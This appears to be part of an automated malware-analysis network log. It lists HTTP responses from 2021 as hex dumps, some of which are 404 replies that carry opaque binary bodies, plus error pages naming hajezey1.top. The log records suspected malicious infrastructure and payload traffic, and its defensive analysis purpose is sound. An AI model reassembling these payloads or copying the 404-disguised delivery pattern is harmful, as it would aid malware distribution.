Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 42 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 76 92 71 06 45 a6 3e 11 dc a4 a3 a6 7e d8 6c a2 05 09 17 f6 cb ee 72 76 25 3f 50 19 01 bf 01 ea 53 01 b3 15 20 f5 3b e2 2a c2 d5 71 18 46 9b 3d f9 5c 40 8f ba f1 80 fe 05 b5 79 9e 10 b0 fb 14 9e 76 e9 bb 27 58 a4 0c 87 05 f0 bf 5f 60 08 d9 eb a8 e1 48 a8 03 88 31 7c 3b 66 ab 4b 11 c0 4d 08 0e 77 13 9e 09 5f 47 0b 5d 16 75 32 39 c5 f7 15 67 aa cf d0 c0 78 9e 0d a3 75 c1 96 52 88 36 19 ff bd 88 13 d8 06 0e 25 4f 12 7d 6f ed e0 04 89 19 d7 57 80 90 30 89 ec f4 4a 6b b6 f0 a2 22 4d 32 d3 49 ad ff bc ff 1a fd f4 3f f4 6f d3 7c cb c6 a8 cc 4e 4d b3 0b 97 2a 60 55 59 ad 30 fb 83 3b 3b ca c3 f3 b2 ec 92 90 1f 1c 57 fe 87 7e 0c 35 8a 3d 40 7f d0 56 81 96 9b 97 9e 70 9f 8a a2 25 44 5a c9 b2 cb 99 64 21 68 85 d2 f8 b8 56 b0 40 f6 0a bf 8b 71 91 e0 55 d0 66 21 df 76 79 27 e4 21 94 42 22 d1 3a 0d b4 43 06 1e 27 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 f0 d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 91 3d 4b 04 78 2d 7f 14 2c d6 e8 b1 14 73 71 10 22 07 4a 86 97 31 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 e3 53 39 f5 c3 a3 23 0c 28 df 52 d2 eb f9 23 19 9d 8c 3f 70 36 45 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 f8 62 47 22 0b 85 d4 ca 55 56 9b 46 76 1d f3 13 02 63 34 42 c2 0c ce ae 70 85 96 36 e2 48 50 67 74 50 b8 87 f6 bc 81 de fb 6e 6a f6 e1 7b 54 3c 81 d2 be 95 df e2 63 10 ec 88 c0 5d 14 66 f2 e6 2f 59 47 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 65 f5 b8 90 c4 f7 07 26 67 1e 54 7a 54 4f 38 c0 5e 33 25 1b 6e 47 94 be 07 13 de 9a 3e 05 22 7d e6 b2 68 60 b9 10 31 eb 8d fc 25 57 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af dd c6 83 41 67 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5d Data Ascii: =]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:06 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 37 33 33 0d 0a b8 00 00 00 c7 1a b4 fa 05 54 a4 5f 28 1e c5 73 c8 bb 6f 2d ae 22 c0 a9 8f 89 bd 2a 1c 21 f8 64 eb 16 a1 85 cc be 11 ce 58 26 9a 05 1e 5c c6 c1 69 3a 30 5b 9b c4 28 c2 ef 63 ab b5 4a e8 89 6e 9c 3d f7 c6 fe 06 43 1d 42 b0 fa b9 17 9d bc 30 e1 7d b4 71 0c f3 55 ca a6 9d 45 22 ea 9d de 0a 6c 39 20 12 7c 4b 07 4c f2 97 87 24 3a c2 ff e2 61 c9 ff 82 3e 8d 64 f6 2c 24 84 19 bd fa 7b 18 4f ce fd ab 1c f3 bb 9d 70 2b 2b eb ec 0b b0 37 d1 d7 3d 24 bb 29 51 24 7c 4e e0 35 9d 11 e0 42 10 5e 4d 2f 68 41 22 93 01 8f 26 1e 4b e8 70 6a ed 03 43 fd b3 0a b8 09 cd 31 c3 31 00 76 26 05 00 99 e1 70 64 01 08 02 00 05 00 9c 03 00 00 8f 53 a0 cd 6b ff f3 42 ef be 5f a6 0b 12 1e 00 fa 2d 5f bc 60 48 43 c4 3f a0 d1 42 cb fe 22 d0 1e 94 d6 c5 1a 29 6e 08 cd c8 2d c7 4d 7e 61 df 49 1a 97 84 14 51 2c 4c e4 c5 d6 02 94 b8 c5 49 53 0d 5e 82 e6 83 ab 8e 62 c5 9d 46 0b a0 aa 3e c7 fd d6 bc a4 ad e8 3c 50 ba e0 3c fe e9 66 4d 4e a6 6b ea 3a 3d ce 29 2a 37 e9 6c 89 d6 f5 15 31 cc 37 72 61 7e 22 b0 24 77 36 7c 4e 6b 9a aa 32 ae ff ad 7d d1 69 71 5e 52 c5 cc 89 d6 bb fa 1e 30 d1 95 9d 4c 69 ee fe ef 04 01 d8 3e 1b 87 e4 46 c1 6e fb 21 19 c0 a0 dd 94 37 60 40 b8 71 82 cf 26 ba ba 93 8d d0 d2 c2 59 ae 5a 2b f1 dd f6 78 90 66 b1 4e ca f3 88 94 76 73 aa 67 95 39 13 f9 1a 7e db 59 b0 5a be ea a7 57 2c da 41 2f 3b 44 99 a6 d1 e3 ae 5d 44 1c 04 12 87 6b 36 97 f0 39 ba 17 30 82 22 5d 97 9c 25 f8 0f 01 a5 f3 47 51 4b c6 6c ab e9 ee 5b 16 36 f0 62 25 02 ed 05 a6 10 4e c2 e6 19 fe 62 4e c5 5b d6 25 26 c8 0b 8d ec 99 23 41 05 8c 38 bb 0c c3 e8 42 32 14 41 b7 83 9c af 9a 27 3e 5a 59 7c a3 5e ee 1c 9c 12 fc 53 8b e3 c9 3c 9d f9 b6 c4 e6 9f 86 54 45 f9 ea dc e7 d2 62 dd f4 b6 fc 61 49 d6 3d 2d fb 53 9e df 18 af 5e 30 3d 56 2a 0f 38 20 a4 0d c3 98 c2 87 1d fd 7b 76 27 90 ad 0d f8 1c 82 12 74 be 06 e5 be c0 91 3d 8d d9 76 35 3a 86 ce 8b 57 89 6b 9e 6b 94 4b fe 6e 7b 84 16 f5 b4 5c b4 8f df 2a 68 2b 33 43 0b 6e 60 35 e6 3b 93 c5 fd e6 62 80 69 e2 92 79 02 9e 47 77 90 92 90 52 4f cf 29 e7 8b 19 b7 16 d5 1a 92 65 37 c9 26 3c 17 27 bd 55 08 ce c3 07 7a 53 f1 6f 43 0a 86 a0 32 60 f8 0d f1 24 e9 e4 c0 fb cd ae cb cb 6c 00 9c ef 2f 87 07 95 d6 a2 32 a9 f4 6b d7 2c e8 2c 27 c2 b7 00 ef 75 ec d5 58 86 2a ad a4 97 43 9a 52 8f 28 e9 1b ce e1 d3 d0 78 92 a0 ab 1e e0 dd 3d cc e0 5a 14 90 1d 7d 10 44 b2 b1 04 a8 db 37 c3 a1 bb 3b 1c f8 3e 56 ed 73 dd 7d b0 6b 95 36 fd 00 c5 00 b0 6f 9b 2b 71 fb 79 82 a6 e1 23 c2 b9 8a a8 89 62 ba 2d 12 c6 52 d3 b1 97 b5 64 20 e9 05 e7 b4 dd e7 89 3a 3b a5 25 ec 86 96 39 8e 21 04 ab 93 4a ec 81 e7 55 81 50 94 e0 5b 5b 40 17 8f ac 1e 17 68 a5 e6 f4 09 11 8f 34 77 8f dc 57 87 c9 7d d9 e7 6b 23 6c 4e d0 db 94 61 ae f2 5c 36 c5 15 c9 a7 a3 39 4b 2b 05 81 e2 8b cf fa 08 90 e8 55 0c 8b 78 14 91 04 c2 44 ed b6 c6 17 7c 82 6c 40 c6 ec b6 91 3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:07 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 39 33 38 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 1d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 85 a5 24 d1 ee 12 d7 a8 78 27 4c 76 46 ea d6 2c 43 64 1b 67 c4 62 1c 74 29 44 86 43 af 6f a0 68 8a 59 6d 82 4a a7 cf 1f c6 a3 13 69 4a 24 b3 ea 27 63 13 57 70 50 68 6a 3e e0 2f 7a 70 79 23 e3 d8 2f 09 13 72 9b be 7c 42 bf 19 de 6c dc 13 55 70 53 0a 46 17 7c e7 ba 3f dc 9e 2e c9 81 e8 ce 05 4c c4 c1 52 3a 54 6b ad 87 f9 07 87 d6 41 c9 b0 26 1c 94 30 99 7f 5b 92 2a 93 5b af a8 98 7a bd 0b e2 a4 22 3e 1a 20 cc cc b6 ca 21 af ad f5 31 a1 a3 cf 37 1f 5a eb 3f 5c c5 74 59 90 8f f5 06 b6 0e cd 9a df a5 61 69 fd 70 12 70 df ce 22 db e0 ab ab b6 2e 08 8f ff dd 4c 76 20 e1 ff 38 5c 3f 0f 83 d0 20 38 ba 60 bd 59 22 09 79 53 40 98 e3 94 54 f0 2f 60 43 8c 47 f0 86 f8 fb 34 6c 1f f1 69 d5 92 4e 76 8c 96 bd 4a 16 e9 37 a2 55 6b 5f c7 ae 4a 88 54 d9 4e 3d b6 7b 93 fe 88 2c 93 7e 87 12 75 d7 9a db 05 a9 46 75 18 c7 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 69 4f 44 88 fe 40 0a 5c 69 ba e8 33 74 16 00 89 12 1e 0d 63 bb 9c d4 46 d1 64 3b df d5 af 2b 02 57 d3 db 53 3d a0 c3 96 8b 7d 64 17 9a f7 3e c2 56 75 1b e2 95 15 f7 bb 2e 64 35 e2 26 2c 74 a4 34 54 05 91 5f ef 6c 05 23 8f f5 4a b0 de 7f 0d 6a f3 d8 90 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 92 d6 ea 8c 11 7d 72 d7 6a ab c1 39 e2 23 13 96 c4 66 d1 30 80 06 10 b2 9c 78 c6 58 43 f6 e7 2a 92 72 08 aa 14 21 52 ff f3 53 5d b5 78 3d f1 24 a0 e9 37 7f 3b 60 ff f1 ee 71 c0 b6 4f 4d bb 75 4b 53 06 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 d3 03 e8 e9 32 2c 0d 90 db 4f f4 47 d3 1c 4c 93 19 c0 0d 04 7d 76 88 52 8c 2a 01 6e fe ca 39 52 41 cc 35 5f 27 89 98 4c 28 48 94 14 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 a1 95 87 04 7d 32 7d 42 02 42 39 ad d5 d3 3c 86 63 55 cd b7 fb 29 6d da 0a 1e d7 09 07 99 cb 23 5b c4 b5 b5 5f 7c a9 84 79 89 b1 39 ec 06 88 45 fa e6 58 a9 e6 e8 4f 67 2c 5e db 50 c7 95 e6 d8 99 0a e2 4c c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 76 ed f6 4b a5 53 52 d2 c5 d4 d1 79 5e 67 ad 6d 11 b0 c0 db 31 a0 29 77 31 ac b2 03 07 1e 17 76 28 bc db 58 67 4b 5b 67 c2 3f d3 78 d9 f8 1f ba e2 50 11 3b ec 5f e0 3c c7 4b d4 50 b0 20 e1 1e 34 ef d3 2e ac 9c d8 f7 0d c2 23 af 38 15 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 6c 1c 9d 89 05 4d 99 2e b4 58 13 86 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 4d 9c 94 1b 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 a6 4d c5 03 97 65 a3 61 7e de f5 36 9c 19 17 7e 4f af 9a a5 84 cb a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 31 70 48 9a 07 fd ec 3f 36 7f ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 